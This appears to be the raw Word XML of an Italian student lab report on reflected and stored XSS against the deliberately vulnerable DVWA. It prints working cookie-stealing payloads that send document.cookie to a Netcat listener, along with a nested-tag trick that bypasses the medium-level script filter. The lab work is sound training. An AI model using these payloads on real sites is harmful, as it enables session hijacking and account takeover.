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D2C0" w14:textId="5AF10059" w:rsidR="00435CA8" w:rsidRDefault="00D81314" w:rsidP="00D81314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2FB86291" w14:textId="77777777" w:rsidR="00D81314" w:rsidRDefault="00D81314" w:rsidP="00D81314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5502D6" w14:textId="7C00B644" w:rsidR="00D81314" w:rsidRDefault="00D81314" w:rsidP="00D81314">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Progetto S6 – L5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F0317" w14:textId="77777777" w:rsidR="00D81314" w:rsidRDefault="00D81314" w:rsidP="00D81314">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D349F21" w14:textId="7226ED43" w:rsidR="00D81314" w:rsidRDefault="00D81314" w:rsidP="00D81314">
      <w:r>
        <w:t>TRACCIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F76D262" w14:textId="0E549253" w:rsidR="00D81314" w:rsidRDefault="00BC1420" w:rsidP="00D81314">
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve">Lo scopo dell'esercizio è quello di usare l’attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve"> per rubare i cookie di sessione alla macchina DVWA, tramite uno script.</w:t>
      </w:r>
      <w:r w:rsidR="000109F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve">Dobbiamo creare una situazione in cui abbiamo una macchina vittima (DVWA), che cliccherà sul link malevolo (XSS), e una macchina che riceve i cookie, nel nostro caso creiamo una sessione aperta con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00700AEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve">Potete usare qualsiasi combinazione, solo Kali, Kali + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve"> o altro.</w:t>
      </w:r>
      <w:r w:rsidR="00700AEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t>Inoltre si deve:</w:t>
      </w:r>
      <w:r w:rsidR="00700AEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t>● Spiegare come si comprende che un sito è vulnerabile.</w:t>
      </w:r>
      <w:r w:rsidR="00700AEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t>● Portare l’attacco XSS.</w:t>
      </w:r>
      <w:r w:rsidR="00700AEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1420">
        <w:t xml:space="preserve">● Fare un report su come avviene l’attacco con tanto di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>screenshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1420">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B505AAE" w14:textId="77777777" w:rsidR="000109F0" w:rsidRDefault="000109F0" w:rsidP="00D81314"/>
    <w:p w14:paraId="59374F69" w14:textId="77777777" w:rsidR="000109F0" w:rsidRDefault="000109F0" w:rsidP="00D81314"/>
    <w:p w14:paraId="092D1249" w14:textId="222A2C71" w:rsidR="000109F0" w:rsidRDefault="000109F0" w:rsidP="00D81314">
      <w:r>
        <w:t>SOLUZIONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730FAE3E" w14:textId="77777777" w:rsidR="00D77C33" w:rsidRDefault="002E179D" w:rsidP="00D81314">
      <w:r>
        <w:t>Cross Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="000B33AF">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000B33AF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D53CF5">
        <w:t>Gli attacchi XSS sono una tipologia di attacc</w:t>
      </w:r>
      <w:r w:rsidR="0092391B">
        <w:t>hi</w:t>
      </w:r>
      <w:r w:rsidR="00D53CF5">
        <w:t xml:space="preserve"> che sfrutta</w:t>
      </w:r>
      <w:r w:rsidR="0092391B">
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidR="00D53CF5">
        <w:t xml:space="preserve"> le vulnerabilità di un </w:t>
      </w:r>
      <w:r w:rsidR="00D43770">
        <w:t>sito web</w:t>
      </w:r>
      <w:r w:rsidR="0092391B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004644B2">
        <w:br/>
        <w:t>Tramite</w:t>
      </w:r>
      <w:r w:rsidR="00707349">
        <w:t xml:space="preserve"> un attacco XSS è possibile</w:t>
      </w:r>
      <w:r w:rsidR="004644B2">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00707349">
        <w:t xml:space="preserve"> modificare il contenuto</w:t>
      </w:r>
      <w:r w:rsidR="004644B2">
        <w:t xml:space="preserve"> di un sito al momento della visualizzazione; </w:t>
      </w:r>
      <w:r w:rsidR="00B07EE3">
        <w:t>iniettare contenuti malevoli; r</w:t>
      </w:r>
      <w:r w:rsidR="00B07EE3" w:rsidRPr="00B07EE3">
        <w:t xml:space="preserve">ubare </w:t>
      </w:r>
      <w:r w:rsidR="00F018D5">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidR="00B07EE3" w:rsidRPr="00B07EE3">
        <w:t xml:space="preserve">cookie, e </w:t>
      </w:r>
      <w:r w:rsidR="00F018D5">
        <w:t>conseguentemente</w:t>
      </w:r>
      <w:r w:rsidR="00B07EE3" w:rsidRPr="00B07EE3">
        <w:t xml:space="preserve"> le sessioni lecite degli utenti</w:t>
      </w:r>
      <w:r w:rsidR="00F018D5">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00A466A3">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A466A3" w:rsidRPr="00A466A3">
        <w:t>seguire operazioni sulla Web App con i privilegi di un utente amministrativo</w:t>
      </w:r>
      <w:r w:rsidR="00A466A3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B4642F">
        <w:br/>
        <w:t>Gli attori coinvolti sono</w:t>
      </w:r>
      <w:r w:rsidR="0053523D">
        <w:t xml:space="preserve"> l’attaccante, la vittima e il sito web vulnerabile visitato da quest’ultima.</w:t>
      </w:r>
      <w:r w:rsidR="003B4CB9">
        <w:br/>
        <w:t xml:space="preserve">Le vulnerabilità dei siti sono generate da </w:t>
      </w:r>
      <w:r w:rsidR="005774D9">
        <w:t xml:space="preserve">errori nella programmazione del sito stesso. </w:t>
      </w:r>
      <w:r w:rsidR="00851F43">
        <w:t>Infatti,</w:t>
      </w:r>
      <w:r w:rsidR="005774D9">
        <w:t xml:space="preserve"> quando un sito non viene </w:t>
      </w:r>
      <w:r w:rsidR="007D4F3E">
        <w:t xml:space="preserve">correttamente </w:t>
      </w:r>
      <w:r w:rsidR="005774D9">
        <w:t>filtrato</w:t>
      </w:r>
      <w:r w:rsidR="00E8078D">
        <w:t xml:space="preserve"> l’input dell’utente </w:t>
      </w:r>
      <w:r w:rsidR="00722603">
        <w:t xml:space="preserve">è in grado di </w:t>
      </w:r>
      <w:r w:rsidR="0051489D">
        <w:t xml:space="preserve">modificare il codice </w:t>
      </w:r>
      <w:r w:rsidR="00C04F36">
        <w:t>che genera l’output.</w:t>
      </w:r>
      <w:r w:rsidR="00B533B9">
        <w:t xml:space="preserve"> L’attaccante può quindi prendere il controllo </w:t>
      </w:r>
      <w:r w:rsidR="009164DD">
        <w:t xml:space="preserve">del codice HTML e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009164DD">
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009164DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB122C">
        <w:t>per portare avanti</w:t>
      </w:r>
      <w:r w:rsidR="006C27EB">
        <w:t xml:space="preserve"> l’attacco a danno degli utenti </w:t>
      </w:r>
      <w:r w:rsidR="000B2607">
        <w:t>che visiteranno il sito.</w:t>
      </w:r>
      <w:r w:rsidR="000B2607">
        <w:br/>
        <w:t xml:space="preserve">Spesso l’attacco XSS è </w:t>
      </w:r>
      <w:r w:rsidR="0015238B">
        <w:t xml:space="preserve">fatto in combinazione con l’ingegneria sociale </w:t>
      </w:r>
      <w:r w:rsidR="00D90EB4">
        <w:t>(tramite phishing o altro) per raggiungere un numero maggiore di utenti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE8B70" w14:textId="77777777" w:rsidR="00D77C33" w:rsidRDefault="00D77C33" w:rsidP="00D81314"/>
    <w:p w14:paraId="675AC31D" w14:textId="3B9C7197" w:rsidR="00893C75" w:rsidRDefault="00893C75" w:rsidP="00D81314">
      <w:r>
        <w:t>Vulnerabilità dei siti web</w:t>
      </w:r>
      <w:r w:rsidR="00A469AE">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A469AE">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Per comprendere</w:t>
      </w:r>
      <w:r w:rsidR="00A469AE">
        <w:t xml:space="preserve"> se un sito web è vulnerabile agli attacchi XSS</w:t>
      </w:r>
      <w:r w:rsidR="00A643F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B87117">
        <w:t xml:space="preserve">bisogna inserire del codice </w:t>
      </w:r>
      <w:r w:rsidR="00C43E69">
        <w:t>dove è possibile scrivere</w:t>
      </w:r>
      <w:r w:rsidR="0020422D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB6425">
        <w:t xml:space="preserve">all’interno del sito (barra di ricerca o altro) </w:t>
      </w:r>
      <w:r w:rsidR="0020422D">
        <w:t>e vedere se viene eseguito. Ad esempio,</w:t>
      </w:r>
      <w:r w:rsidR="00F74E09">
        <w:t xml:space="preserve"> si può inserire </w:t>
      </w:r>
      <w:r w:rsidR="00326B01">
        <w:t>“&lt;i&gt; hello”, se la scritta “hello” viene visualizzata</w:t>
      </w:r>
      <w:r w:rsidR="00C43E69">
        <w:t xml:space="preserve"> in corsivo significa</w:t>
      </w:r>
      <w:r w:rsidR="0020422D">
        <w:t xml:space="preserve"> che il sito è vulnerabile.</w:t>
      </w:r>
      <w:r w:rsidR="00D77C33">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006467D6">
        <w:t xml:space="preserve">In alternativa </w:t>
      </w:r>
      <w:r w:rsidR="00FB1E36">
        <w:t>è possibile usare degli appositi tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506F860" w14:textId="6AF4B96B" w:rsidR="0023695A" w:rsidRDefault="0023695A" w:rsidP="00D81314"/>
    <w:p w14:paraId="4F866626" w14:textId="77777777" w:rsidR="0023695A" w:rsidRDefault="0023695A" w:rsidP="00D81314"/>
    <w:p w14:paraId="76D0AFAB" w14:textId="77777777" w:rsidR="0023695A" w:rsidRDefault="0023695A" w:rsidP="00D81314"/>
    <w:p w14:paraId="1F750E55" w14:textId="77777777" w:rsidR="0023695A" w:rsidRDefault="0023695A" w:rsidP="00D81314"/>
    <w:p w14:paraId="4E215598" w14:textId="26055B32" w:rsidR="0023695A" w:rsidRDefault="007F4D5B" w:rsidP="00D81314">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attacco XSS con report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2559C8" w14:textId="676B11A2" w:rsidR="00A45FD7" w:rsidRPr="004C2D05" w:rsidRDefault="007F4D5B" w:rsidP="00D81314">
      <w:r>
        <w:t xml:space="preserve">Per prima cosa si apre DVWA inserendo nel browser di Kali l’indirizzo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB173D">
        <w:t xml:space="preserve"> (192.168.1.110).</w:t>
      </w:r>
      <w:r w:rsidR="0023211B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000B4337">
        <w:t xml:space="preserve">Si setta la difficoltà su “low” e si apre l’apposita sezione “XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A45FD7">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="000B4337">
        <w:t>eflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B4337">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A45FD7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0023211B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A45FD7">
        <w:t>A questo punto si deve testare la vulnerabilità</w:t>
      </w:r>
      <w:r w:rsidR="00B93844">
        <w:t xml:space="preserve"> del sito web</w:t>
      </w:r>
      <w:r w:rsidR="004F423E">
        <w:t xml:space="preserve">. In questo caso </w:t>
      </w:r>
      <w:r w:rsidR="0092149E">
        <w:t>si è prima</w:t>
      </w:r>
      <w:r w:rsidR="004F423E">
        <w:t xml:space="preserve"> inserito </w:t>
      </w:r>
      <w:r w:rsidR="0092149E">
        <w:t xml:space="preserve">“hello”, </w:t>
      </w:r>
      <w:r w:rsidR="00975766">
        <w:t xml:space="preserve">poi si è inserito </w:t>
      </w:r>
      <w:r w:rsidR="004F423E">
        <w:t>“&lt;i&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A47E9F">
        <w:t xml:space="preserve"> hello”</w:t>
      </w:r>
      <w:r w:rsidR="0092149E">
        <w:t xml:space="preserve"> e abbiamo </w:t>
      </w:r>
      <w:r w:rsidR="004C2D05">
        <w:t xml:space="preserve">così </w:t>
      </w:r>
      <w:r w:rsidR="0092149E">
        <w:t xml:space="preserve">ottenuto </w:t>
      </w:r>
      <w:r w:rsidR="004C2D05">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004C2D05">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hello”</w:t>
      </w:r>
      <w:r w:rsidR="004C2D05">
        <w:t xml:space="preserve"> scritto in </w:t>
      </w:r>
      <w:r w:rsidR="0067577D">
        <w:t>corsivo (seconda immagine).</w:t>
      </w:r>
      <w:r w:rsidR="004B46DD">
        <w:t xml:space="preserve"> Questo significa che possiamo tentare l’attacco XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69286CF1" w14:textId="52B0D951" w:rsidR="00D62B73" w:rsidRDefault="007F4D5B" w:rsidP="00D81314">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD0A468" wp14:editId="29B9BFF6">
            <wp:extent cx="3916680" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1231728158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28158" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, software&#10;&#10;Descrizione generat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54"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3916680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A8ACC" w14:textId="77777777" w:rsidR="00BE297B" w:rsidRDefault="00BE297B" w:rsidP="00D81314"/>
    <w:p w14:paraId="28294E1A" w14:textId="24D08B99" w:rsidR="0067577D" w:rsidRDefault="0067577D" w:rsidP="00D81314">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F88454B" wp14:editId="34455F63">
            <wp:extent cx="3924640" cy="1950889"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1326829726" name="Immagine 2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29726" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, numer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7DAA" w14:textId="77777777" w:rsidR="0023695A" w:rsidRDefault="0023695A" w:rsidP="00D81314"/>
    <w:p w14:paraId="368E91D5" w14:textId="6DACBE02" w:rsidR="00D62B73" w:rsidRDefault="00E26DEC" w:rsidP="00D81314">
      <w:r>
        <w:t>Segue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A970F27" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="21453632" w14:textId="77777777" w:rsidR="00D62B73" w:rsidRDefault="00D62B73" w:rsidP="00D81314"/>
    <w:p w14:paraId="18B354EF" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="27070DCA" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="6B877F5F" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="310A5B7B" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="223FC6BB" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="37D1F67D" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="06762C4E" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="30E8CB81" w14:textId="77777777" w:rsidR="00E26DEC" w:rsidRDefault="00E26DEC" w:rsidP="00D81314"/>
    <w:p w14:paraId="44761F11" w14:textId="5D72A22C" w:rsidR="0082153E" w:rsidRDefault="00E26DEC" w:rsidP="00D81314">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L’attacco ha lo scopo di rubare i cookie di sessione a DVW</w:t>
      </w:r>
      <w:r w:rsidR="00DE76F6">
        <w:t>A tramite uno script. Di seguito lo script utilizzato:</w:t>
      </w:r>
      <w:r w:rsidR="00DE76F6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0082153E" w:rsidRPr="0082153E">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0082153E" w:rsidRPr="0082153E">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0082153E" w:rsidRPr="0082153E">
        <w:t xml:space="preserve">=‘http://127.0.0.1:4444/?cookie=‘ + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0082153E" w:rsidRPr="0082153E">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0082153E" w:rsidRPr="0082153E">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0082153E">
        <w:br/>
        <w:t xml:space="preserve">Questo script ci permette di indirizzare i cookie </w:t>
      </w:r>
      <w:r w:rsidR="00F15ED1">
        <w:t xml:space="preserve">di sessione </w:t>
      </w:r>
      <w:r w:rsidR="00955483">
        <w:t>all’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00955483">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00955483">
        <w:t xml:space="preserve"> e alla porta scelta. Utilizzando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00955483">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00955483">
        <w:t xml:space="preserve"> ci si mette quindi in ascolto </w:t>
      </w:r>
      <w:r w:rsidR="00EB7CE1">
        <w:t xml:space="preserve">sulla porta 4444. </w:t>
      </w:r>
      <w:r w:rsidR="008C4AA8">
        <w:t>Il risultato</w:t>
      </w:r>
      <w:r w:rsidR="00F15ED1">
        <w:t xml:space="preserve"> dell’attacco è riportato nell’immagine appena sotto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3357E0" w14:textId="24E0D49F" w:rsidR="0023695A" w:rsidRDefault="004B46DD" w:rsidP="00D81314">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6049ABE8" wp14:editId="3EB4A1BB">
            <wp:extent cx="6120130" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1544586046" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Sito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86046" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Sito Web&#10;&#10;Descrizione generat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22"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="612013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AE442" w14:textId="77777777" w:rsidR="008C4AA8" w:rsidRDefault="008C4AA8" w:rsidP="00D81314"/>
    <w:p w14:paraId="376CE23E" w14:textId="77777777" w:rsidR="008C4AA8" w:rsidRDefault="008C4AA8" w:rsidP="00D81314"/>
    <w:p w14:paraId="1116180C" w14:textId="689FC24E" w:rsidR="007D57EE" w:rsidRDefault="00B56533" w:rsidP="00D81314">
      <w:bookmarkStart w:id="0" w:name="_Hlk156566659"/>
      <w:r>
        <w:t>Si è deciso di provare anche con difficoltà della DVWA impostata su “medium”</w:t>
      </w:r>
      <w:r w:rsidR="00412E29">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00412E29">
        <w:br/>
        <w:t xml:space="preserve">In questo caso il programmatore ha </w:t>
      </w:r>
      <w:r w:rsidR="009447C8">
        <w:t>aggiunto</w:t>
      </w:r>
      <w:r w:rsidR="00412E29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D5F88">
        <w:t>un semplice pattern che non permette “</w:t>
      </w:r>
      <w:r w:rsidR="002328EB">
        <w:t>&lt;script&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="009447C8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009447C8">
        <w:br/>
        <w:t>Per aggirare a questo</w:t>
      </w:r>
      <w:r w:rsidR="00B3542C">
        <w:t xml:space="preserve"> si è pensato di utilizzare il seguente script:</w:t>
      </w:r>
      <w:r w:rsidR="00B3542C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>scr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>ipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t xml:space="preserve">='http://127.0.0.1:4444/?cookie=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D57EE" w:rsidRPr="007D57EE">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="007D57EE">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F93089">
        <w:t>Il risultato dell’attacco è riportato nell’immagine appena sotto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F83F42" w14:textId="72C60318" w:rsidR="00F93089" w:rsidRDefault="00F93089" w:rsidP="00D81314">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3171B252" wp14:editId="0F2B2AA6">
            <wp:extent cx="6120130" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="272465456" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, Sito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65456" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, Sito Web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7C33" w14:textId="77777777" w:rsidR="00F93089" w:rsidRDefault="00F93089" w:rsidP="00D81314"/>
    <w:p w14:paraId="6939503A" w14:textId="475DFD8D" w:rsidR="00F93089" w:rsidRDefault="00F93089" w:rsidP="00D81314">
      <w:r>
        <w:t>Segue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352B591" w14:textId="77777777" w:rsidR="009C4E74" w:rsidRDefault="009C4E74" w:rsidP="00D81314"/>
    <w:p w14:paraId="592DDA20" w14:textId="415FAF3F" w:rsidR="00FD5938" w:rsidRDefault="00FD5938" w:rsidP="00FD5938">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5938">
        <w:lastRenderedPageBreak/>
        <w:t>Bonus.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:t xml:space="preserve">Provate a fare la stessa cosa ma usando l’attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD5938">
        <w:t>stored.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FD5938">
        <w:t>P.S. Attenzione al numero dei caratteri (50).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FFB53" w14:textId="2E32F2B8" w:rsidR="00FD5938" w:rsidRDefault="009F0B47" w:rsidP="00FD5938">
      <w:r>
        <w:t xml:space="preserve">Come bonus si è effettuato lo stesso furto di cookie ma con un XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F81284">
        <w:t xml:space="preserve"> che a differenza del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F81284">
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F81284">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F47FC">
        <w:t>viene eseguito ogni volta che un utente</w:t>
      </w:r>
      <w:r w:rsidR="00D16ABF">
        <w:t xml:space="preserve"> visita la pagina</w:t>
      </w:r>
      <w:r w:rsidR="00136966">
        <w:t xml:space="preserve"> in quanto il codice malevolo viene salvato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C4BA6" w14:textId="46901E9D" w:rsidR="00387BA8" w:rsidRDefault="00387BA8" w:rsidP="00FD5938">
      <w:r>
        <w:t xml:space="preserve">Prima di effettuare </w:t>
      </w:r>
      <w:r w:rsidR="0052796A">
        <w:t>il furto di cookie si è utilizzato uno script volto a fa</w:t>
      </w:r>
      <w:r w:rsidR="0096073B">
        <w:t xml:space="preserve">rli apparire sullo schermo. Questo è stato fatto per rientrare </w:t>
      </w:r>
      <w:r w:rsidR="00E639EA">
        <w:t xml:space="preserve">nel massimo di </w:t>
      </w:r>
      <w:r w:rsidR="0096073B">
        <w:t>50 caratteri inseribili in DVWA.</w:t>
      </w:r>
    </w:p>
